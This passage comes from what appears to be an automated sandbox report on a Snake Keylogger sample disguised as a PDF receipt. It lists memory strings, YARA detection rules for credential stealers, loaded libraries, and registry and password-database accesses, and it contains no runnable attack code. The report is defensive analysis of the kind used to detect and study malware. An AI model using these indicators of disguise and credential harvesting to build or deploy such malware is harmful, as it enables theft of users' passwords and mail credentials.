                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB2D883_2_06DB2D88
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB6D593_2_06DB6D59
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB8D583_2_06DB8D58
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB8D493_2_06DB8D49
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB4D783_2_06DB4D78
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB2D783_2_06DB2D78
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB4D693_2_06DB4D69
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB6D683_2_06DB6D68
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBAD103_2_06DBAD10
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBCD003_2_06DBCD00
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBAD003_2_06DBAD00
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB9AD03_2_06DB9AD0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBBAC03_2_06DBBAC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB9AC03_2_06DB9AC0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBBAB13_2_06DBBAB1
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB32183_2_06DB3218
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB52083_2_06DB5208
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB32073_2_06DB3207
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBA3DF3_2_06DBA3DF
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBC3D03_2_06DBC3D0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBA3F03_2_06DBA3F0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBC3E03_2_06DBC3E0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB23973_2_06DB2397
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB23A83_2_06DB23A8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB7B183_2_06DB7B18
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBEB183_2_06DBEB18
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB5B173_2_06DB5B17
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBEB0B3_2_06DBEB0B
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB7B083_2_06DB7B08
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB3B383_2_06DB3B38
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB5B283_2_06DB5B28
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB3B273_2_06DB3B27
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB68D83_2_06DB68D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB48D83_2_06DB48D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB88C83_2_06DB88C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB68C83_2_06DB68C8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB48E83_2_06DB48E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBA8803_2_06DBA880
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB88B83_2_06DB88B8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB00403_2_06DB0040
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBA8733_2_06DBA873
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBC8703_2_06DBC870
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBC8613_2_06DBC861
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB00143_2_06DB0014
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB00073_2_06DB0007
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB91D83_2_06DB91D8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB71F83_2_06DB71F8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB51F73_2_06DB51F7
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB91E83_2_06DB91E8
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DB71E73_2_06DB71E7
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBD1903_2_06DBD190
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBB1903_2_06DBB190
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBE1883_2_06DBE188
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBD1803_2_06DBD180
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBB1A03_2_06DBB1A0
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBF95F3_2_06DBF95F
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBF9703_2_06DBF970
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 3_2_06DBE1773_2_06DBE177
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000000.2031577480.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekAyu.exe< vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2045691225.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2041394043.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2046122911.00000000081C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042995856.0000000003E09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000000.00000002.2042530353.0000000003072000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4499767526.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeBinary or memory string: OriginalFilenamekAyu.exe< vs rDEKONT-1_15_2025__75kb__pdf.exe
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.rDEKONT-1_15_2025__75kb__pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.49b6238.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.492e818.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_15_2025__75kb__pdf.exe.48a6df8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.4499590469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2042995856.0000000004672000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: rDEKONT-1_15_2025__75kb__pdf.exe PID: 320, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rDEKONT-1_15_2025__75kb__pdf.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeMutant created: NULL
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003346000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_15_2025__75kb__pdf.exe, 00000003.00000002.4501375928.0000000003353000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeVirustotal: Detection: 27%
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeReversingLabs: Detection: 34%
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile read: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeProcess created: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: rDEKONT-1_15_2025__75kb__pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exeCode function: 0_2_060C1B02 push 840536A5h; iretd 0_2_060C1B0D
